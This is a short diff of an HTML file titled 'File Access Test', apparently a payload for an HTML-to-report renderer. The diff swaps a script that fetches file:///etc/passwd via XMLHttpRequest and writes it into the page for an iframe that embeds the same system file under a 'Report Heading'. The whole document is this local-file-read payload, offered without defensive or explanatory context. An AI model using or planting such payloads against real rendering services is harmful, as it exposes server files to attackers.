--- a/index.html
+++ b/index.html
@@ -5,13 +5,8 @@
     <title>File Access Test</title>
 </head>
 <body>
-    <script>
-        x = new XMLHttpRequest;
-        x.onload = function() {
-            document.write(this.responseText);
-        };
-        x.open("GET", "file:///etc/passwd");
-        x.send();
-    </script>
+    <div><p>Report Heading</p><iframe src="file:///etc/passwd" height="500" width="500"></iframe>
+    </div>
+        
 </body>
 </html>
